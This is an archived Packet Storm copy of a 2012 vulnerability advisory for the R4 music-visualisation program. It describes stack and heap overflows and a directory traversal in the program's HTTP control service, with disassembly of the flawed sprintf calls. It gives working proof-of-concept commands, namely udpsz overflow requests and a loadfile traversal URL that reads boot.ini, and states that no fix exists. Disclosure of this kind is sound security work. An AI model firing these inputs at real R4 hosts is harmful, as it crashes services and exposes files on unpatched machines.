exploit the possibilities

R4 1.25 Overflows / Directory Traversal

R4 1.25 Overflows / Directory Traversal
Posted Feb 17, 2012
Authored by Luigi Auriemma | Site aluigi.org

R4 versions 1.25 and below suffer from stack overflows, a heap overflow, and a directory traversal vulnerability.

tags | exploit, overflow
MD5 | 4becbc0586fa6f248aaff1c3084f2812

R4 1.25 Overflows / Directory Traversal

Change Mirror Download
#######################################################################

Luigi Auriemma

Application: R4
http://r4.rabidhamster.org/R4/
Versions: <= 1.25
Platforms: Windows
Bugs: A] stack overflow
B] heap overflow
C] directory traversal
D] screenshot stack overflow
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"R4 is a standalone OpenGL accelerated program which aims to produce
animated 3D graphics in real-time that twist and turn with the music."

It's very used in parties and other events in which are needed 3d
animations based on the current music.


#######################################################################

=======
2) Bugs
=======


R4 has an http service disabled by default which allows to control it
from remote, all the following vulnerabilities are located in this
component.


-----------------
A] stack overflow
-----------------

Buffer overflow caused by the calling of sprintf() for generating a log
string using the HTTP arguments received from the client in a stack
buffer of 2 kilobytes:

0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0041ECD4 |. 81EC 00080000 SUB ESP,800
0041ECDA |. 85D2 TEST EDX,EDX
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]
0041ECEA |. 85C9 TEST ECX,ECX
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]
0041ECFA |. 85C0 TEST EAX,EAX
0041ECFC |. 74 2E JE SHORT R4.0041ED2C
0041ECFE |. 53 PUSH EBX
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]
0041ED01 |. 84DB TEST BL,BL
0041ED03 |. 5B POP EBX
0041ED04 |. 74 26 JE SHORT R4.0041ED2C
0041ED06 |. 50 PUSH EAX
0041ED07 |. 51 PUSH ECX
0041ED08 |. 52 PUSH EDX
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"
0041ED12 |. 50 PUSH EAX ; stack buffer
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()
0041ED18 |. 83C4 14 ADD ESP,14
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]
0041ED1F |. 52 PUSH EDX
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50
0041ED25 |. 81C4 04080000 ADD ESP,804
0041ED2B |. C3 RETN


----------------
B] heap overflow
----------------

Heap overflow/corruption caused by a long HTTP URI.


----------------------
C] directory traversal
----------------------

Directory traversal exploitable through the "loadfile" script command
that can be executed from left_console.html and allows to view the
files on the disk in which is installed the software.


----------------------------
D] screenshot stack overflow
----------------------------

Stack overflow through the "miniscreenshot" command:

0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0040B984 . 81EC 04010000 SUB ESP,104
...
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]
0040BA25 . 56 PUSH ESI
0040BA26 . 52 PUSH EDX
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"
0040BA30 . 50 PUSH EAX ; stack buffer
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

A]
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000

B]
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000

C]
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])

D]
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close